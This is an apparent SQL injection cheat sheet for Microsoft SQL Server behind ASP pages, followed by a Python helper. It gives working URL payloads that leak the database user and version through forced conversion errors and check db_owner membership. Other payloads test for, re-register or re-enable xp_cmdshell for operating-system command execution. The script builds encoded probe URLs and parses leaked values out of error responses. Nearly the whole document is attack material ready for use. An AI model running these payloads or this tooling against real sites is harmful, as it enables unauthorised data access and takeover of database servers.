Current user / database name detection:
http://www.xxx.com/asp?=xx' and user>0-- //"--" comments out the rest of the query. Comparing the nvarchar value of user with an int forces a conversion error whose text quotes the current database user (e.g. dbo); despite the original heading, this probe does not reveal the database name.
SQL Server version detection:
http://www.xxx.com/asp?=xx' and 1=(select @@VERSION)-- //Microsoft SQL Server version string, quoted in the conversion error
http://www.xxx.com/asp?=xx' and 1=convert(int,@@version)-- //same result, forcing the conversion explicitly
Database privilege check:
http://www.xxx.com/asp?=xx and 1=(Select IS_MEMBER('db_owner')) //boolean: the page renders normally only if the current user is a member of db_owner
http://www.xxx.com/asp?=xx and char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- //error-based: the conversion error quotes '|1|' for db_owner or '|0|' otherwise; %2B is a URL-encoded "+"
Check whether the xp_cmdshell extended stored procedure exists:
http://www.xxx.com/asp?=xx and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell') //boolean: true only while xp_cmdshell is registered in master
Command to restore the xp_cmdshell extended stored procedure:
http://www.xxx.com/asp?=xx ;exec master.dbo.sp_addextendedproc 'xp_cmdshell','X:\inetput\web\xplog70.dll';-- //"X" is the drive letter; the path must point to a copy of xplog70.dll on the database server. This re-registers the procedure after it has been dropped (the SQL Server 2000 case); on SQL Server 2005 and later xp_cmdshell is disabled rather than dropped and is turned back on through the xp_cmdshell server configuration option instead.
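The probes above all rely on the same two mechanisms: forcing a type-conversion error so the server quotes a value in its error text, or making the page render normally only when a condition holds. The following Python helpers, added here as an example and not code from the original page, build the percent-encoded probe URLs and parse the leaked value out of a captured response. They go beyond the page in two ways: a db_name() probe (an assumption, aimed at the database name the original heading promised) and the sp_configure re-enable statement for SQL Server 2005 and later. The base URL, parameter name and every sample server response are constructed for illustration.

```python
"""Error-based MSSQL injection helpers for the probes listed above.

Added example, not code from the original page. The URL base, parameter name
and the sample server responses below are constructed for illustration.
"""
import re
from urllib.parse import quote

# Injection suffixes appended to the vulnerable parameter value. Each probe
# either forces a conversion error that quotes a value (error-based) or makes
# the page render normally only when a condition holds (boolean).
PROBES = {
    # Comparing the nvarchar user with an int forces an error quoting the user name.
    "db_user": "' and user>0--",
    # Assumption: the same trick aimed at db_name() quotes the database name.
    "db_name": "' and db_name()>0--",
    "version": "' and 1=(select @@VERSION)--",
    # '|1|' (db_owner) or '|0|' ends up quoted in the error text.
    "db_owner": "' and char(124)+cast(is_member('db_owner') as varchar(1))+char(124)=1;--",
    # Boolean: true only while xp_cmdshell is registered in master.
    "xp_cmdshell_present": "' and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')--",
    # Stacked statements (the driver must allow them). The first re-registers the
    # procedure on SQL Server 2000; the second re-enables it on 2005 and later.
    "xp_cmdshell_readd": "';exec master.dbo.sp_addextendedproc 'xp_cmdshell','X:\\inetput\\web\\xplog70.dll';--",
    "xp_cmdshell_enable": "';exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;--",
}

# SQL Server 2005+ wording and the older SQL Server 2000 wording of the error.
_LEAK_RE = re.compile(
    r"(?:Conversion failed when converting the|Syntax error converting the) "
    r"\w+ value '(?P<leak>[^']*)' to (?:a column of )?data type int",
    re.IGNORECASE,
)


def build_url(base, param, value, probe):
    """Return the full probe URL with the payload percent-encoded."""
    return f"{base}?{param}={quote(value + PROBES[probe], safe='')}"


def extract_leak(body):
    """Return the value quoted in the conversion error, or None if there is no error."""
    m = _LEAK_RE.search(body)
    return m.group("leak").strip() if m else None


def is_db_owner(body):
    """Interpret the error-based db_owner probe: True for '|1|', False for '|0|', None if no error."""
    leak = extract_leak(body)
    if leak is None:
        return None
    return leak == "|1|"


def condition_true(body, baseline):
    """Boolean probe: the injected condition held if the page matches the normal response."""
    return body == baseline


# Constructed sample responses in the style of a classic ASP / OLE DB error page.
SAMPLE_USER = ("Microsoft OLE DB Provider for SQL Server error '80040e07'\n"
               "Conversion failed when converting the nvarchar value 'dbo' to data type int.\n")
SAMPLE_USER_2000 = "Syntax error converting the nvarchar value 'dbo' to a column of data type int.\n"
SAMPLE_OWNER = "Conversion failed when converting the varchar value '|1|' to data type int.\n"
SAMPLE_VERSION = ("Conversion failed when converting the nvarchar value "
                  "'Microsoft SQL Server 2008 R2 (SP3) - 10.50.6000.34 (X64) \n"
                  "\tStandard Edition (64-bit) on Windows NT 6.1 <X64>' to data type int.\n")
SAMPLE_NORMAL = "<html><body>Product xx</body></html>"

if __name__ == "__main__":
    print(build_url("http://www.xxx.com/asp", "id", "xx", "db_user"))
    print(extract_leak(SAMPLE_USER), extract_leak(SAMPLE_USER_2000))
    print(extract_leak(SAMPLE_VERSION).splitlines()[0])
    print(is_db_owner(SAMPLE_OWNER), condition_true(SAMPLE_NORMAL, SAMPLE_NORMAL))
```

Run the script as-is to see the built URL and the values recovered from the constructed responses; in practice the sample strings are replaced by the body of the HTTP response to each probe, and condition_true() is fed a baseline captured from an un-injected request.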